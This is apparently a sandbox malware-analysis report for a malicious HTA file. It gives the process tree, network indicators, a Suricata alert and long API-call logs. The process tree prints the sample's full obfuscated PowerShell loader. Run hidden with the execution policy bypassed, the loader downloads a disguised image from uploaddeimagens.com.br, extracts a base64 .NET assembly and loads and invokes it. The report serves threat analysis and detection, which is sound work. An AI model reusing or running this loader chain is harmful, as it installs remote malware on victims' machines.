popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

brAZILLLFile_HTA.hta

Generic Malware Antivirus AntiVM AntiDebug PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Nov. 28, 2023, 9:53 a.m. Nov. 28, 2023, 9:55 a.m.
Size 398.9KB
Type HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 e72b286e211eec5f15fcd218ffcc389c
SHA256 acda00175c25b7c46db09c114c670c4766f5bcf10cdb4b0d7604ae5bcac71086
CRC32 1CCAE911
ssdeep 1536:hZqA12P958MVRhRhp55jEL8MVRhRhp55jZfx4C5/c+sA0AAzfffff8BfffffmffJ:XZZxXRnjLnKpTWmCnSs+6av
Yara
  • Antivirus - Contains references to security software

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\brAZILLLFile_HTA.hta.html

    2624

    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2624 CREDAT:145409

      2712

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8AbQBlAFsANABdACsAJABwAFMASABvAE0ARQBbADMANABdACsAJwBYACcAKQAoACgAKAAnAHsAMQB9AGkAbQBhAGcAZQBVAHIAbAAgAD0AIAB7ADAAfQBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AJwArACcAbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA2ADYANwAvADYAMAA4AC8AbwByAGkAZwBpAG4AYQBsAC8AaAB0AGEALgBqAHAAZwA/ADEANwAwADAAMgA2ADgAOAA0ADAAewAwAH0AOwB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AJwArACcAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ADsAewAxAH0AaQBtAGEAZwBlAEIAeQB0AGUAcwAnACsAJwAgAD0AIAB7ADEAfQB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAewAxAH0AaQBtAGEAZwAnACsAJwBlAFUAcgBsACkAOwB7ADEAfQBpAG0AYQBnACcAKwAnAGUAVABlAHgAdAAgAD0AIAAnACsAJwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAB7ADEAfQBpAG0AYQBnACcAKwAnAGUAQgB5AHQAZQBzACkAOwB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AHsAMAB9ADsAewAxAH0AZQBuAGQARgBsAGEAZwAgAD0AIAB7ADAAfQA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAAnACsAJwA+AD4AewAwAH0AOwB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAAnACsAJwB0AC4ASQBuAGQAZQAnACsAJwB4AE8AZgAoAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnACkAOwB7ACcAKwAnADEAfQBlAG4AZABJAG4AZABlAHgAIAA9ACAAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAewAxACcAKwAnAH0AJwArACcAZQBuAGQARgBsAGEAZwApADsAewAxAH0AcwAnACsAJwB0AGEAcgB0AEkAbgAnACsAJwBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAB7ADEAfQBlACcAKwAnAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAOwB7ADEAfQBzAHQAYQAnACsAJwByAHQASQBuAGQAZQB4ACAAKwA9ACAAewAxAH0AJwArACcAcwB0AGEAJwArACcAcgAnACsAJwB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AHsAMQB9AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAHsAMQB9AGUAbgAnACsAJwBkAEkAbgBkAGUAeAAgAC0AIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhACcAKwAnAG4AZAAgAD0AIAB7ADEAfQBpAG0AJwArACcAYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAewAxAH0AcwB0AGEAcgB0AEkAJwArACcAbgBkAGUAeAAsACAAewAxAH0AYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7AHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAB7ADEAfQBiAGEAcwBlADYANABDACcAKwAnAG8AbQBtAGEAbgBkACkAOwB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvACcAKwAnAGEAZAAoAHsAMQB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwB7ADEAfQB0AHkAcABlACAAPQAgAHsAMQB9AGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAB7ADAAfQBGAGkAYgBlAHIALgBIAG8AbQBlAHsAMAB9ACkAOwB7ADEAfQBtAGUAdABoAG8AZAAgAD0AIAB7ADEAfQB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAB7ADAAfQBWAEEASQB7ADAAfQApAC4ASQBuAHYAbwBrAGUAKAB7ADEAfQBuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAB7ADAAfQBNAGoAUQB3AFkAMgBZAHoAWgBEAEUANQBPAFQAQgBoAEwAVwBFADEAWQBtAEUAdABaAFQARQB4ACcAKwAnAE4AQwAwAHoATQBXAE0ANABMAFQAWQAnACsAJwB4AE0ARAAnACsAJwBZADEATwBEAEkAeABQAFcANQBsAGEAMgA5ADAASgBtAEYAcABaAEcAVgB0AFAAWABSAHMAWQBUADkAMABlAEgAUQB1AE4ARABaAGwAYwAyAEYAaQBjAEcAOQBqAGMAMgBWAHoAZQBXADAAdgBiAHkAOQB0ACcAKwAnAGIAMgBNAHUAZABHADkAdwBjADMAQgB3AFkAUwA0ADIATgBHAEUAeABNAGkAMQBrAGEAVwA5AHkAWgBDADkAJwArACcAaQBMAHoAQgAyAEwAMgAxAHYAWQB5ADUAegBhAFgAQgBoAFoAVwB4AG4AYgAyADkAbgBMAG0AVgBuAFkAWABKAHYAZABIAE4AbABjADIARgBpAFoAWABKAHAAWgBpADgAdgBPAG4ATgB3AGQASAAnACsAJwBSAG8AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgB7ADAAfQAgACwAIAB7ADAAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAnACsAJwAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACcAKwAnACkAJwApAC0AZgAgACAAWwBDAEgAYQBSAF0AMwA5ACwAWwBDAEgAYQBSAF0AMwA2ACkAIAApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

        2944

        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PShOme[4]+$pSHoME[34]+'X')((('{1}imageUrl = {0}https://uploaddeimagens.co'+'m.br/images/004/667/608/original/hta.jpg?1700268840{0};{1}webClien'+'t = New-Object System.Net.We'+'bClient;{1}imageBytes'+' = {1}webClient.DownloadData({1}imag'+'eUrl);{1}imag'+'eText = '+'[System.Text.Encoding]::UTF8.GetString({1}imag'+'eBytes);{1}startFlag = {0}<<BASE64_START>>{0};{1}endFlag = {0}<<BASE64_END'+'>>{0};{1}startIndex = {1}imageTex'+'t.Inde'+'xOf({1}startFlag);{'+'1}endIndex = {1}imageText.IndexOf({1'+'}'+'endFlag);{1}s'+'tartIn'+'dex -ge 0 -and {1}e'+'ndIndex -gt {1}startIndex;{1}sta'+'rtIndex += {1}'+'sta'+'r'+'tFlag.Length;{1}base64Length = {1}en'+'dIndex - {1}startIndex;{1}base64Comma'+'nd = {1}im'+'ageText.Substring({1}startI'+'ndex, {1}base64Length);{1}commandBytes = [Syst'+'em.Convert]::FromBase64String({1}base64C'+'ommand);{1}loadedAssembly = [System.Reflection.Assembly]::Lo'+'ad({1}commandBytes);{1}type = {1}loadedAssembly.GetType({0}Fiber.Home{0});{1}method = {1}type.GetMethod({0}VAI{0}).Invoke({1}null, [object[]] ({0}MjQwY2YzZDE5OTBhLWE1YmEtZTEx'+'NC0zMWM4LTY'+'xMD'+'Y1ODIxPW5la290JmFpZGVtPXRsYT90eHQuNDZlc2FicG9jc2VzeW0vby9t'+'b2MudG9wc3BwYS42NGExMi1kaW9yZC9'+'iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdH'+'Ro{0} , {0}dfdfd{0} , {0}dfdf{0} , {0}dfdf{0} , {0}dadsa{0} , {'+'0}de{0} , {0}cu{0})'+')')-f [CHaR]39,[CHaR]36) )"

          1356

Name Response Post-Analysis Lookup
apps.identrust.com
A 121.254.136.9
CNAME a1952.dscq.akamai.net
CNAME identrust.edgesuite.net
A 121.254.136.18
23.67.53.17
uploaddeimagens.com.br
A 104.21.45.138
A 172.67.215.45
172.67.215.45
IP Address Status Action
104.21.45.138 Active Moloch
121.254.136.9 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49177 -> 104.21.45.138:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49177
104.21.45.138:443 		C=US, O=Let's Encrypt, CN=E1 CN=uploaddeimagens.com.br d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: False
console_handle: 0x00000000000003ff
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000244a50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43cc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43cc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43cc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43d070
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43d070
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43cc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43cc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43cc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43cc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43d620
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43d620
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43d620
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43cc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43cc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43cc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43d4d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43d4d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43d4d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43d4d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43d4d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43d4d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43d4d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43d4d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43cc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43cc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43cc80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43dbd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43dbd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b41ff50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b41ff50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b41fee0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b41fee0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b41fee0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43dbd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b43dbd0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b463170
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b463170
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b463bf0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b463bf0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000004b1ba0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a5510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a5510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a5510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a4e80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a4e80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a5510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a5510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a5510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b6a5510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2624
region_size: 9637888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002cb0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2624
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000035e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2624
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002fb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000035e0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a21000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769cd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefbca5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefefc4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdcd1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ba000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2624
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
